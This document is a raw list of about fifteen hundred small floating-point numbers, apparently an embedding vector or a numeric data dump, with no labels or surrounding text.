0.0008707718225196004, -0.0036859000101685524, -0.01748069003224373, 0.00010928737901849672, 0.022870216518640518, 0.0100383460521698, -0.00570344552397728, -0.0031550598796457052, 0.00827475730329752, -0.005632901564240456, 0.02505706623196602, -0.00757637619972229, 0.024351630359888077, -0.0014055800857022405, -0.003999818582087755, -0.009177714586257935, -0.030898071825504303, -0.016225013881921768, -0.015279730781912804, 0.029854027554392815, 0.004973319824784994, -0.007992583326995373, 0.013791262172162533, 0.009918421506881714, -0.004246721044182777, -0.005897440016269684, -0.012415663339197636, 0.003915166482329369, -0.022884324193000793, 0.012048836797475815, 0.013600794598460197, 0.00433490052819252, -0.014800035394728184, -0.012140543200075626, 0.004105634056031704, 0.0036400468088686466, 0.0012583204079419374, 0.013713664375245571, -0.0066310930997133255, 0.0024178798776119947, -0.017621776089072227, -0.023561542853713036, 0.008824996650218964, 0.005833950825035572, -0.020711584016680717, 0.012394499965012074, -0.02130414918065071, -0.03673907741904259, 0.033352985978126526, 0.012888304889202118, 0.001043162657879293, 0.024549152702093124, 0.005061499308794737, 0.010017182677984238, 0.025536762550473213, -0.0021868497133255005, -0.0011286966037005186, -0.015180970542132854, -0.01829899474978447, 0.010334628634154797, 0.007830332964658737, -0.01377009879797697, 0.0008914939826354384, 0.004204395227134228, -0.007100207265466452, -0.02130414918065071, 0.0028817036654800177, 0.0017327257664874196, -0.0201049093157053, -0.014327392913401127, 0.002368499292060733, -0.010715563781559467, 0.018722256645560265, -0.0359489880502224, -0.0038269872311502695, 0.007922039367258549, 0.00578457023948431, 0.024577369913458824, 0.003465451532974839, -0.009015464223921299, -0.022503389045596123, 0.029261460527777672, 0.013121098279953003, 0.023674411699175835, 0.028160981833934784, 0.010948357172310352, -0.02945898286998272, -0.002315591787919402, 0.013748936355113983, 0.0313495509326458, -0.005841005127876997, -0.0037176446057856083, -0.025649631395936012, 0.00681097898632288, 0.01254264172166586, -0.015928732231259346, 0.004313737619668245, 0.004782852251082659, 0.006384190637618303, -0.0045359497889876366, 0.005685809534043074, 0.0060350000858306885, -0.011604412458837032, 0.004627656191587448, 0.003301437711343169, 0.015322057530283928, -0.008190104737877846, -0.006835669279098511, -0.005908021703362465, 0.02302541211247444, 0.006641674321144819, -0.03369159623980522, 0.025452109053730965, -0.0029593014623969793, -0.007992583326995373, -0.003999818582087755, 0.0025272222701460123, -0.008168942295014858, -0.00862747523933649, -0.012465043924748898, -0.004916884936392307, -0.0011278148740530014, 0.017142079770565033, -0.010948357172310352, 0.004574748687446117, -0.015745317563414574, 0.009664464741945267, 0.010715563781559467, 0.0016524824313819408, 0.011618521064519882, -0.006616984028369188, -0.021346475929021835, 0.00575635302811861, -0.006394771859049797, 0.023801390081644058, -0.007555213291198015, -0.015886405482888222, -0.00018616882152855396, -0.017565341666340828, 0.013840642757713795, 0.004722889978438616, 0.013480870984494686, -0.02179795503616333, 0.002329700393602252, -0.014658947475254536, 0.01509631797671318, -0.006458261050283909, 0.011357510462403297, -0.003292619716376066, 0.0035695030819624662, 0.008437007665634155, -0.0010378718143329024, -0.003788188099861145, -0.01701510138809681, -0.0037599706556648016, -0.006214885972440243, -0.0027511981315910816, 0.01070850994437933, -0.009742063470184803, -0.0012292212340980768, -0.0009638011106289923, 0.04379342868924141, 0.00268770894035697, 0.007639865390956402, -0.0011013610055670142, 0.019427690654993057, 0.007914985530078411, -0.012627294287085533, 0.007054354064166546, -0.017029210925102234, -0.007689245976507664, -0.00025483855279162526, -0.013311565853655338, -0.021543998271226883, 0.01780518889427185, -0.020683366805315018, 0.004035090561956167, 0.005696390755474567, -0.0077597894705832005, -0.0011092971544712782, 0.01725495047867298, 0.000977028044871986, 0.0031409512739628553, -0.00777389807626605, 0.013798316940665245, 0.008126615546643734, 0.008034909144043922, 0.023759065195918083, -0.007001446560025215, 0.005858641117811203, 0.004070362541824579, -0.01513864379376173, -0.016295557841658592, 0.018891559913754463, -0.010518042370676994, 0.00795731134712696, -0.024520935490727425, 0.0178616251796484, -0.004218503832817078, 0.015688883140683174, 0.01319869700819254, 0.007639865390956402, -0.019709864631295204, -0.02756841666996479, 0.012338065542280674, 0.01400289312005043, 0.013255131430923939, -0.019540561363101006, 0.013897077180445194, 0.04356769099831581, -0.002892285119742155, -0.00964330229908228, -0.009579813107848167, -0.0010643256828188896, -0.0034495792351663113, -0.006204304285347462, -0.02398480474948883, 0.018341321498155594, 0.01660594902932644, 0.0011304602958261967, -0.033522289246320724, -0.017494797706604004, -0.003292619716376066, 0.012366282753646374, -0.0037035360001027584, 0.017635885626077652, -0.017297277227044106, 0.0006772180204279721, 0.010412226431071758, 0.01512453518807888, 0.0005815433105453849, 0.004920411854982376, -0.01334683783352375, -0.01512453518807888, -0.0003154618898406625, 0.00941050797700882, -0.00786560494452715, -0.007075516972690821, -0.010179433040320873, 0.007844441570341587, -0.0027265078388154507, -0.019738083705306053, -0.015434926375746727, 0.03758559748530388, 0.0024408064782619476, 0.028330286964774132, -0.002208012854680419, -0.0011754317674785852, -0.0011339874472469091, 0.03318368270993233, -0.022418737411499023, -0.006765125785022974, -0.010200596414506435, -0.011033009737730026, 0.0201613437384367, -0.01594283990561962, -0.01401700172573328, -0.009798497892916203, -0.006616984028369188, 0.0033384731505066156, 0.004454824607819319, -0.02040119282901287, 0.007992583326995373, -0.003357872599735856, -0.004571221303194761, -0.0074846697971224785, 0.006465315353125334, -0.00045015595969744027, 0.013706610538065434, -0.0016154471086338162, 0.022545715793967247, 0.00198932783678174, 0.006945011671632528, 0.008310029283165932, -0.003650628263130784, 0.005802206229418516, -0.020711584016680717, 0.005812787916511297, 0.023970695212483406, 0.014842361211776733, -0.0026189289055764675, -0.006761598400771618, 0.01838364638388157, 0.003543049329891801, 0.022912541404366493, -0.02133236639201641, 0.00861336663365364, -0.002908157417550683, 0.009156551212072372, -0.01725495047867298, 0.0050473902374506, 0.01952645182609558, 0.0038975307252258062, 0.006137288175523281, -0.009699736721813679, 0.01955466903746128, 0.005939766298979521, -0.0071566421538591385, -0.004930993542075157, 0.013868859969079494, -0.007780952379107475, -0.008549877442419529, -0.0068462505005300045, 0.009473997168242931, -0.0008134552044793963, 0.010948357172310352, -0.005925657693296671, 0.005953874904662371, -0.00932585634291172, -0.0017036264762282372, -0.01923017017543316, 0.0017300803447142243, 0.0005797797348350286, -0.0007094034808687866, -0.02686298079788685, -0.004116215743124485, 0.020909106358885765, -0.01742425560951233, 0.014828252606093884, 0.004447770304977894, -0.010941303335130215, 0.009248258545994759, -0.008197159506380558, 0.011385727673768997, -0.0057422444224357605, 0.0074846697971224785, 0.013043500483036041, -0.007639865390956402, -0.006733381189405918, -0.016281450167298317, -0.006084380205720663, 0.021134844049811363, -0.020626932382583618, 0.016154471784830093, -0.005925657693296671, 0.0038834218867123127, -0.00753405038267374, 0.004056253470480442, 0.010151215828955173, 0.013706610538065434, 0.03033372201025486, -0.011399836279451847, -0.013840642757713795, 0.007703354582190514, -0.0199920404702425, -0.019159626215696335, -0.008881432004272938, -0.0033596360590308905, 0.005661119241267443, 0.035243552178144455, 0.03473563864827156, 0.00753405038267374, -0.0007570203742943704, -0.00002026749098149594, -0.0019822735339403152, 0.016154471784830093, -0.02322293445467949, -0.033550508320331573, -0.014122816734015942, 0.03016441874206066, -0.015392600558698177, 0.012027673423290253, 0.027638958767056465, -0.007618702482432127, 0.019244277849793434, -0.011195260100066662, 0.0008932576165534556, -0.0059820921160280704, -0.00020545806910376996, -0.01070850994437933, 0.0045500583946704865, 0.005696390755474567, 0.006990864872932434, 0.0005154087557457387, -0.0034019623417407274, -0.0060279457829892635, -0.0222353246062994, 0.025593196973204613, 0.0013253367505967617, 0.03374803066253662, 0.01070850994437933, 0.011935967020690441, 0.010510987602174282, 0.028189199045300484, -0.012055891565978527, -0.005308401305228472, 0.006052635610103607, 0.014856469817459583, -0.028076330199837685, 0.002460205927491188, -0.0013658993411809206, 0.017113862559199333, 0.005269602406769991, 0.012563805095851421, 0.0007486433605663478, 0.015815861523151398, -0.007188386749476194, 0.005290765780955553, 0.01470127422362566, -0.004959210753440857, 0.00736474571749568, -0.0074423435144126415, 0.008571039885282516, 0.003428416093811393, -0.001010536216199398, -0.00544243399053812, 0.004863976966589689, 0.026919415220618248, -0.009248258545994759, -0.009347018785774708, -0.013417381793260574, -0.016591841354966164, -0.009819661267101765, -0.00558704836294055, -0.011399836279451847, -0.02176973596215248, 0.001848240732215345, 0.014898795634508133, 0.000814777915365994, -0.008782670833170414, -0.020175453275442123, -0.023815499618649483, -0.0002486659795977175, -0.003932802472263575, 0.003236185060814023, 0.0111740967258811, 0.004144432954490185, -0.0033631634432822466, 0.00646884273737669, -0.01698688417673111, -0.0025148773565888405, -0.05448783189058304, -0.0033437637612223625, -0.008860268630087376, -0.017297277227044106, 0.0029628288466483355, 0.0054212710820138454, 0.003527177032083273, -0.012401554733514786, 0.03292972594499588, -0.016704710200428963, 0.008415844291448593, 0.00866980105638504, 0.008183050900697708, -0.015449035912752151, 0.017791081219911575, 0.034284159541130066, -0.023476891219615936, -0.012761326506733894, -0.019385365769267082, 0.024436281993985176, 0.005340145900845528, 0.009664464741945267, 0.004119742661714554, 0.0022697383537888527, -0.017184406518936157, -0.020471734926104546, 0.018933886662125587, -0.004278465639799833, -0.01298001129180193, -0.010786107741296291, -0.011463325470685959, -0.013233968056738377, -0.015406709164381027, 0.0035553944762796164, 0.0037776066455990076, 0.006768652703613043, -0.011682010255753994, -0.0019822735339403152, 0.015787644311785698, -0.01769232004880905, -0.019018538296222687, 0.0028958122711628675, 0.011011846363544464, -0.022136563435196877, 0.0037458620499819517, 0.0030686440877616405, -0.01319869700819254, 0.004998010117560625, 0.016182688996195793, 0.00013149756705388427, 0.011971239000558853, -0.007689245976507664, -0.013643121346831322, -0.025889480486512184, 0.001954056089743972, 0.00021096927230246365, -0.016351992264389992, 0.011138824746012688, 0.013431490398943424, -0.009636247530579567, 0.011957130394876003, -0.00831708312034607, 0.018552951514720917, -0.010948357172310352, 0.017791081219911575, -0.02363208681344986, -0.000822714064270258, -0.006317174062132835, 0.024238761514425278, 0.02258804254233837, -0.022461064159870148, 0.0015096317511051893, -0.002118069911375642, -0.01044749841094017, -0.0051108794286847115, 0.004779324866831303, 0.024760782718658447, -0.022066019475460052, -0.028245633468031883, 0.004098579753190279, 0.01267667394131422, 0.016563624143600464, 0.049493350088596344, 0.029995113611221313, -0.009897259064018726, -0.007258930243551731, -0.00756226759403944, -0.00799963716417551, 0.01070850994437933, -0.02581893652677536, 0.0035571581684052944, -0.00296459230594337, -0.009974856860935688, 0.01331862062215805, 0.026383284479379654, 0.0034830872900784016, -0.006627565715461969, 0.0016595368506386876, -0.0013218095991760492, 0.015688883140683174, 0.006458261050283909, 0.014355611056089401, -0.002354390686377883, 0.00555883115157485, -0.0310673750936985, 0.012599076144397259, -0.03673907741904259, 0.018369538709521294, 0.005036809016019106, -0.009932531043887138, -0.005474178586155176, -0.0016101563815027475, 0.0009241203661076725, 0.012309848330914974, -0.006084380205720663, -0.003851677291095257, -0.02617165446281433, 0.015322057530283928, -0.0017000993248075247, 0.00004590841490426101, -0.004747580271214247, 0.006077325902879238, -0.016182688996195793, 0.0027071083895862103, 0.004624129272997379, 0.004592384677380323, 0.006306592375040054, -0.004056253470480442, 0.014228632673621178, -0.02176973596215248, 0.005195531994104385, -0.008775616995990276, -0.008937866427004337, -0.009121280163526535, -0.009946639649569988, -0.0019134936155751348, 0.009586866945028305, -0.01331862062215805, 0.012838924303650856, -0.009043682366609573, -0.027991676703095436, -0.004303155932575464, -0.0012988829985260963, 0.019413582980632782, -0.0065781851299107075, 0.014870578423142433, -0.0011780771892517805, -0.027497872710227966, 0.0018870397470891476, -0.014658947475254536, 0.009290584363043308, 0.017381928861141205, 0.013904131948947906, 0.008733290247619152, -0.009918421506881714, -0.0030827526934444904, 0.0036400468088686466, -0.004941575229167938, -0.010546259582042694, -0.0065605491399765015, 0.004197340924292803, -0.027836481109261513, 0.006948538590222597, -0.0019029120448976755, -0.010172378271818161, 0.011900695040822029, -0.010235867463052273, 0.010242922231554985, -0.005565885454416275, -0.005639956332743168, -0.03563859686255455, -0.011195260100066662, 0.006793342996388674, -0.0035165955778211355, -0.008190104737877846, -0.006645201705396175, -0.0004977728822268546, -0.0004968910943716764, 0.006317174062132835, -0.021981367841362953, 0.012535586953163147, -0.0017097990494221449, 0.02683476358652115, 0.004102107137441635, 0.0201895609498024, -0.013262186199426651, 0.01010888908058405, -0.014165143482387066, -0.006359500344842672, 0.013099935837090015, -0.005752825643867254, 0.0031550598796457052, -0.01821434311568737, -0.003096861531957984, 0.010821378789842129, 0.006264266557991505, -0.006370081566274166, -0.0040068733505904675, 0.0028305596206337214, 0.014362664893269539, -0.016478970646858215, -0.018538841977715492, -0.0003152414574287832, -0.0003379476547706872, -0.020034365355968475, -0.0020016729831695557, -0.00679687038064003, 0.012627294287085533, -0.027878807857632637, 0.0005365718388929963, 0.004595911595970392, -0.018045037984848022, 0.001303291879594326, -0.0024884233716875315, 0.018425973132252693, 0.004458351992070675, -0.004384281113743782, -0.009198877960443497, 0.0310673750936985, -0.002714162692427635, 0.0039469110779464245, 0.0016630640020594, 0.00042568618664518, 0.00001478383182984544, 0.009036627598106861, 0.019568778574466705, 0.009530432522296906, 0.012860087677836418, 0.009932531043887138, 0.01614036224782467, -0.014658947475254536, 0.008824996650218964, 0.020119018852710724, 0.01687401533126831, -0.009946639649569988, 0.010786107741296291, -0.0037211717572063208, 0.017071537673473358, 0.004416025709360838, 0.015251513570547104, 0.00022904605430085212, -0.025014739483594894, -0.0039116395637393, 0.0036224108189344406, -0.01731138490140438, 0.003243239363655448, 0.009565704502165318, 0.005043863318860531, -0.01508220937103033, -0.013544360175728798, 0.008528714068233967, 0.02945898286998272, 0.013734827749431133, 0.0017574159428477287, -0.017960386350750923, 0.015477253124117851, -0.004056253470480442, -0.002135705668479204, 0.0313495509326458, -0.0006701636593788862, -0.0019170207669958472, 0.03213963657617569, -0.016366101801395416, 0.006913267076015472, -0.017706429585814476, -0.00739296292886138, 0.0025466219522058964, 0.008190104737877846, -0.008556931279599667, 0.004736998584121466, 0.016507187858223915, 0.006648728623986244, 0.01638020947575569, 0.012006510980427265, -0.0042678844183683395, 0.010814324952661991, 0.0111740967258811, 0.022997194901108742, -0.011547978036105633, 0.0059750378131866455, -0.01657773181796074, -0.022164780646562576, -0.015336166135966778, 0.019441800191998482, -0.003551867324858904, -0.004729944281280041, 0.010137107223272324, -0.0006432689260691404, 0.00015255040489137173, 0.0013138734502717853, -0.013036446645855904, -0.0010740254074335098, 0.008733290247619152, -0.0023420455399900675, 0.0034160709474235773, 0.0056999181397259235, 0.022475171834230423, -0.02264447696506977, -0.016478970646858215, 0.00011694796558003873, 0.01695866696536541, -0.011428053490817547, -0.0009796734666451812, -0.0015457853442057967, 0.0032873291056603193, -0.01158324908465147, -0.010828433558344841, 0.011498597450554371, -0.015604231506586075, 0.00011187764903297648, 0.0009153024293482304, -0.005932711996138096, 0.0006273966282606125, 0.006507641635835171, 0.004073889460414648, 0.009304692968726158, -0.0010616802610456944, -0.02097964845597744, 0.024549152702093124, 0.0037035360001027584, -0.017184406518936157, 0.018087364733219147, -0.00469114538282156, -0.01638020947575569, -0.0020810344722121954, -0.004578275606036186, -0.0001523299579275772, -0.004564167000353336, -0.006221940275281668, 0.006380663253366947, 0.01299411989748478, -0.012888304889202118, 0.004313737619668245, 0.008345301263034344, 0.012711945921182632, -0.01264845672994852, -0.003038662951439619, -0.005354254972189665, -0.023942478001117706, 0.004775797948241234, -0.0005445079877972603, 0.004913357552140951, 0.00039724831003695726, -0.00003367351746419445, -0.007287147920578718, -0.006084380205720663, -0.0014364428352564573, 0.018609385937452316, 0.032365377992391586, 0.005625847261399031, -0.007611648179590702, 0.002290901495143771, -0.0028323230799287558, -0.016888123005628586, -0.014179252088069916, 0.009833769872784615, -0.03027728758752346, -0.000017484326235717162, -0.02349099889397621, 0.015406709164381027, 0.010341683402657509, 0.01772053726017475, -0.0008950211922638118, 0.014842361211776733, -0.01947001740336418, 0.01085665076971054, 0.004073889460414648, 0.0006384190637618303, -0.008909649215638638, 0.0010008364915847778, -0.013558468781411648, -0.0036471011117100716, -0.00524491211399436, 0.021431127563118935, 0.007597539573907852, -0.0023332275450229645, -0.004408971406519413, -0.012824815697968006, -0.011604412458837032, -0.007809170056134462, 0.011152934283018112, 0.0077950614504516125, 0.005174368619918823, -0.029882244765758514, -0.009220040403306484, -0.00003400419154786505, -0.015815861523151398, -0.004035090561956167, 0.027413221076130867, -0.022912541404366493, -0.004539476707577705, -0.012888304889202118, 0.009114225395023823, 0.0311238095164299, 0.01474360004067421, -0.0030175000429153442, -0.012902413494884968, -0.007519941311329603, 0.004698199685662985, -0.01920195110142231, -0.014341501519083977, -0.01110355369746685, 0.012119380757212639, 0.008980193175375462, 0.007802115753293037, 0.0178334079682827, 0.010898977518081665, -0.004468933213502169, 0.013911186717450619, 0.0024831327609717846, -0.019046755507588387, 0.005654064938426018, 0.004856922663748264, -0.0005555303650908172, -0.015025774016976357, 0.0021551051177084446, 0.01993560418486595, 0.011505651287734509, -0.01605571061372757, -0.0031973859295248985, 0.0201049093157053, 0.020330648869276047, -0.0072166044265031815, -0.0100101288408041, -0.012380391359329224, -0.00648295134305954, 0.010800216346979141, 0.003119788132607937, -0.017113862559199333, -0.016718819737434387, -0.00013844169734511524, 0.014179252088069916, 0.00025131137226708233, 0.01829899474978447, -0.0032150219194591045, -0.011759608052670956, 0.005269602406769991, 0.008380572311580181, -0.014658947475254536, 0.0021251242142170668, -0.01226752158254385, 0.006070271600037813, 0.021374693140387535, -0.0006388599285855889, 0.00288523081690073, -0.0156465582549572, -0.030926289036870003, 0.025593196973204613, -0.0015272676246240735, 0.001809441833756864, 0.0012204032391309738, -0.03984299302101135, 0.0038728404324501753, 0.0018217869801446795, -0.007329473737627268, -0.03318368270993233, 0.016041601076722145, 0.0036788457073271275, -0.015801753848791122, 0.009022518992424011, 0.023392237722873688, -0.03733164072036743, -0.0003452224482316524, 0.01002423744648695, 0.03445346653461456, 0.013445599004626274, -0.00470525398850441, 0.03628759831190109, 0.004856922663748264, 0.020471734926104546, 0.009149497374892235, -0.009502215310931206, 0.02552265301346779, -0.020669257268309593, 0.016309667378664017, -0.001998145831748843, 0.0201613437384367, -0.0021868497133255005, 0.007858550176024437, 0.009833769872784615, -0.0028376139234751463, 0.02275734581053257, -0.008824996650218964, -0.012041782960295677, 0.030841635540127754, -0.013748936355113983, -0.015322057530283928, -0.0037705523427575827, -0.007879713550209999, -0.019568778574466705, -0.013389164581894875, -0.0222917590290308, 0.014983448199927807, 0.008500496856868267, 0.002493714215233922, 0.019681647419929504, -0.00234557269141078, 0.0245914775878191, 0.0009302929393015802, -0.006514695938676596, -0.014313284307718277, 0.015688883140683174, 0.0014628967037424445, -0.016422536224126816, 0.00022992785670794547, 0.012486206367611885, 0.028654785826802254, -0.01405932754278183, 0.026623131707310677, -0.007900876924395561, 0.0009743826813064516, -0.02948720008134842, 0.00649705994874239, 0.02363208681344986, -0.005897440016269684, -0.005837478209286928, -0.001384416944347322, 0.018397755920886993, 0.002601293148472905, -0.00009721781680127606, 0.02535334788262844, 0.028922852128744125, 0.0015369673492386937, 0.012020619586110115, 0.0060350000858306885, -0.00648295134305954, -0.009220040403306484, 0.000798905617557466, -0.014997556805610657, -0.015251513570547104, 0.000443983415607363, 0.012055891565978527, -0.016450753435492516, -0.006214885972440243, 0.007195441052317619, 0.007096680346876383, 0.0007032309076748788, 0.007400017697364092, 0.023039519786834717, -0.009551595896482468, -0.0356103777885437, -0.008020800538361073, -0.0089308125898242, 0.004564167000353336, 0.009170660749077797, 0.0044936235062778, 0.0029628288466483355, -0.009911367669701576, 0.004786379169672728, 0.011808988638222218, -0.019103191792964935, 0.01512453518807888, 0.00047352351248264313, 0.02622808888554573, -0.012450935319066048, -0.004913357552140951, 0.017325494438409805, 0.024873653426766396, -0.010842542164027691, -0.01652129739522934, 0.012041782960295677, 0.0033296551555395126, -0.0016392555553466082, -0.0006877995328977704, -0.02619987167418003, -0.023095956072211266, 0.001767115667462349, 0.00830297451466322, 0.013763044960796833, -0.011272857896983624, -0.011089445091784, 0.022164780646562576, 0.011667901650071144, 0.003364926902577281, -0.025593196973204613, 0.013142261654138565, 0.008747398853302002, 0.00891670398414135, 0.0013544360408559442, -0.03896825388073921, -0.00739296292886138, -0.00786560494452715, -0.012493261136114597, -0.001099597429856658, -0.006634620018303394, 0.012154651805758476, 0.012627294287085533, 0.009473997168242931, -0.016225013881921768, -0.005333091598004103, -0.011928913183510303, 0.007802115753293037, -0.009198877960443497, -0.006158451084047556, 0.022926650941371918, -0.0026506735011935234, 0.023448674008250237, -0.00027622206835076213, 0.00014979479601606727, -0.007858550176024437, 0.018313102424144745, -0.010172378271818161, -0.004433661699295044, -0.011364564299583435, 0.0025960023049265146, 0.0178898423910141, -0.019907386973500252, -0.00891670398414135, 0.0005846295971423388, 0.010757889598608017, 0.02092321403324604, 0.0006864768220111728, 0.0133045120164752, -0.008634529076516628, -0.01993560418486595, -0.012613184750080109, 0.02130414918065071, 0.0014531969791278243, -0.0007887649699114263, 0.0024055347312241793, -0.022009585052728653, 0.004627656191587448, 0.01474360004067421, 0.011181151494383812, -0.005971510894596577, -0.002932847710326314, -0.009861987084150314, -0.0005793388118036091, -0.008817942813038826, -0.012902413494884968, -0.013530251570045948, 0.00023367548419628292, -0.0056011569686234, 0.0023103009443730116, -0.004412498325109482, -0.014221577905118465, -0.02330758608877659, -0.009156551212072372, -0.0038834218867123127, -0.021783845499157906, -0.005393053870648146, 0.01515275239944458, -0.017212623730301857, 0.0026771274860948324, 0.04258008301258087, 0.019244277849793434, 0.004694672767072916, 0.022432846948504448, 0.00824654009193182, 0.009636247530579567, -0.015195079147815704, 0.030898071825504303, 0.007428234908729792, -0.005826896522194147, -0.010179433040320873, 0.0019681646954268217, -0.009854932315647602, 0.004338427912443876, 0.02136058360338211, 0.006006782408803701, 0.0034425246994942427, -0.004162068944424391, 0.0048780860379338264, -0.011999456211924553, -0.01722673326730728, -0.01515275239944458, 0.013523196801543236, -0.015745317563414574, -0.04754634574055672, 0.014997556805610657, 0.009064844809472561, -0.03143420070409775, -0.011251694522798061, -0.013516142964363098, 0.011696118861436844, -0.006313647143542767, -0.012620239518582821, 0.0008954620570875704, 0.008824996650218964, -0.008429952897131443, -0.01824256032705307, 0.026989959180355072, -0.016704710200428963, 0.005453015677630901, -0.028781764209270477, -0.002925793407484889, -0.001728316769003868, 0.0199920404702425, 0.012719000689685345, 0.01516686100512743, 0.008366463705897331, -0.006052635610103607, 0.007050827145576477, 0.01357963215559721, -0.008563986048102379, -0.0029945734422653913, 0.0015766480937600136, -0.03767025098204613, 0.004620601888746023, 0.021021975204348564, -0.019187843427062035, 0.009156551212072372, 0.014278012327849865, 0.005855113733559847, 0.024379847571253777, -0.013487924821674824, -0.003031608648598194, -0.00011805020767496899, -0.010694400407373905, 0.016662385314702988, 0.011181151494383812, 0.0100665632635355, 0.012493261136114597, 0.007086098659783602, -0.019216060638427734, 0.01512453518807888, -0.008063126355409622, 0.007541104685515165, -0.005050917621701956, -0.01377009879797697, 0.008966083638370037, 0.009861987084150314, -0.007237767335027456, 0.015844078734517097, -0.0178616251796484, -0.008563986048102379, 0.007470561191439629, 0.00467703677713871, 0.0051214611157774925, 0.016182688996195793, 0.0033437637612223625, -0.002491950523108244, -0.002299719490110874, 0.014517860487103462, 0.053105179220438004, 0.005488287657499313, 0.008789725601673126, 0.0042925747111439705, 0.009227095171809196, 0.009636247530579567, 0.010828433558344841, -0.0033208371605724096, -0.012070000171661377, -0.0062783751636743546, 0.0032397122122347355, -0.011294021271169186, 0.00464881956577301, -0.004998010117560625, -0.022418737411499023, -0.009847878478467464, 0.020937323570251465, -0.0030457174871116877, 0.00536130927503109, 0.015688883140683174, -0.00010245347220916301, -0.010637965984642506, -0.039814773947000504, 0.015223296359181404, -0.014278012327849865, -0.01293768547475338, -0.0025289859622716904, -0.007929094135761261, -0.009671519510447979, -0.009234149940311909, 0.0048533957451581955, 0.014912904240190983, 0.020993757992982864, 0.0031250789761543274, -0.001728316769003868, -0.004581802990287542, 0.023787282407283783, 0.015745317563414574, -0.012683728709816933, -0.007978474721312523, -0.002255629748106003, 0.001783869811333716, -0.0005718435859307647, 0.02106430195271969, 0.0006340100662782788, -0.007703354582190514, 0.0013323911698535085, 0.005837478209286928, -0.004472460597753525, 0.009593921713531017, 0.005213167518377304, 0.019893279299139977, 0.02313828095793724, -0.021543998271226883, 0.030841635540127754, -0.005251966416835785, -0.01654951460659504, 0.02322293445467949, -0.004938047844916582, 0.01614036224782467, -0.010496878996491432, 0.006772180087864399, 0.03504602983593941, 0.014912904240190983, 0.019159626215696335, 0.005886858329176903, 0.008310029283165932, 0.013459707610309124, 0.0244221743196249, -0.009290584363043308, 0.015886405482888222, -0.0003798328689299524, 0.02404123917222023, 0.0010546259582042694, -0.0006022654706612229, 0.00939639937132597, -0.0062431031838059425, -0.005978565197438002, -0.012126434594392776, -0.01838364638388157, -0.00798552855849266, -0.00033750676084309816, -0.010948357172310352, -0.006514695938676596, -0.020669257268309593, 0.01879279874265194, 0.008542822673916817, -0.01903264783322811, -0.022066019475460052, -0.015773536637425423, 0.027497872710227966, 0.0034742692951112986, 0.0027600161265581846, 0.009939584881067276, -0.02308184653520584, 0.014531969092786312, -0.016916342079639435, -0.024704348295927048, 0.006176087073981762, -0.000022403086404665373, 0.016182688996195793, -0.010602694004774094, -0.012246359139680862, -0.015322057530283928, 0.009544541127979755, -0.013248076662421227, 0.0027600161265581846, 0.029063938185572624, 0.02327936887741089, -0.013269240036606789, -0.024577369913458824, 0.005467124283313751, -0.008345301263034344, 0.00891670398414135, -0.007188386749476194, 0.0021145427599549294, 0.008500496856868267, -0.016944559291005135, -0.016507187858223915, -0.006800397299230099, -0.018990321084856987, -0.02051406167447567, 0.0072060227394104, 0.005936238914728165, -0.0016992175951600075, -0.009946639649569988, -0.019836843013763428, 0.00739296292886138, 0.004020981956273317, -0.0111176623031497, 0.016239123418927193, -0.022715020924806595, -0.000574488949496299, -0.002264447743073106, 0.004264357034116983, 0.008817942813038826, -0.020612822845578194, 0.005890385713428259, 0.022094236686825752, -0.03829103335738182, -0.010334628634154797, 0.007780952379107475, 0.024577369913458824, -0.008775616995990276, 0.02185438945889473, -0.007414126303046942, -0.002678890945389867, 0.013121098279953003, -0.013791262172162533, 0.0033067285548895597, -0.017664102837443352, -0.005893913097679615, -0.021261822432279587, -0.00103434466291219, -0.01289535965770483, -0.02573428303003311, -0.0245632603764534, 0.003953965380787849, -0.011456270702183247, 0.012726054526865482, 0.001042280811816454, -0.008761507458984852, -0.007914985530078411, 0.016013383865356445, 0.011089445091784, 0.027526089921593666, -0.00023169144697021693, -0.007188386749476194, 0.009276475757360458, -0.010828433558344841, 0.005523559171706438, 0.005805733613669872, -0.009798497892916203, 0.028302067890763283, 0.01289535965770483, 0.014115762896835804, -0.01366428378969431, -0.01687401533126831, -0.00430668331682682, -0.024958305060863495, -0.005241385195404291, 0.028570134192705154, 0.012987066060304642, -0.04190286248922348, -0.006743962410837412, 0.007625756785273552, 0.012366282753646374, -0.008740345016121864, -0.01040517259389162, -0.006768652703613043, -0.016690602526068687, 0.02718748152256012, 0.009861987084150314, -0.009861987084150314, -0.003869313281029463, -0.00537541788071394, 0.012429771944880486, -0.009227095171809196, -0.001719498774036765, -0.008373518474400043, -0.001370308338664472, 0.004380753729492426, -0.00939639937132597, 0.03648512065410614, -0.015576014295220375, -0.01914551667869091, -0.01296590268611908, 0.015209187753498554, -0.02330758608877659, -0.0075269960798323154, -0.024055346846580505, -0.015815861523151398, 0.01914551667869091, 0.01876458153128624, 0.019738083705306053, 0.0015792935155332088, -0.01142099965363741, -0.00024205252702813596, 0.003749389201402664, -0.013706610538065434, -0.01652129739522934, -0.021261822432279587, -0.0003516154538374394, -0.013875914737582207, -0.0051390971057116985, 0.04624834656715393, 0.013798316940665245, -0.0356103777885437, 0.009452834725379944, 0.012521478347480297, 0.0005145269678905606, -0.017960386350750923, -0.015237404964864254, -0.008542822673916817, -0.030869852751493454, -0.010800216346979141, -0.011660847812891006, 0.009128334000706673, 0.013939403928816319, -0.01646486297249794, 0.0133045120164752, 0.010941303335130215, 0.025861261412501335, -0.0054494887590408325, -0.022334085777401924, -0.007879713550209999, -0.015886405482888222, 0.035328205674886703, -0.008415844291448593, -0.008514605462551117, 0.009015464223921299, -0.002402007579803467, -0.005209640599787235, -0.0025113499723374844, -0.005061499308794737, 0.018552951514720917, -0.0010863705538213253, -0.008817942813038826, 0.01553368754684925, 0.0004455265589058399, 0.009184769354760647, -0.0038940035738050938, 0.02415410801768303, 0.0030615897849202156, 0.0011798407649621367, 0.0014620148576796055, 0.019441800191998482, 0.0042149764485657215, 0.009255312383174896, 0.017438363283872604, 0.019441800191998482, -0.0033860900439321995, -0.020245997235178947, 0.00962919369339943, 0.01511042658239603, 0.016351992264389992, 0.010518042370676994, -0.008472279645502567, 0.014249795116484165, 0.0019328930648043752, 0.013981729745864868, 0.004765216261148453, -0.018284885212779045, 0.004049199167639017, -0.014249795116484165, 0.029148591682314873, -0.015928732231259346, -0.00702260946854949, -0.006539386231452227, -0.027032285928726196, -0.0032555845100432634, 0.0024478607811033726, 0.021656867116689682, 0.00799963716417551, 0.01337505504488945, -0.018905669450759888, -0.009685628116130829, 0.007400017697364092, -0.010017182677984238, 0.001694808597676456, -0.016676492989063263, -0.0034090166445821524, -0.015872295945882797, 0.001818259828723967, 0.0031585870310664177, -0.005460069980472326, 0.024295195937156677, -0.005491814576089382, 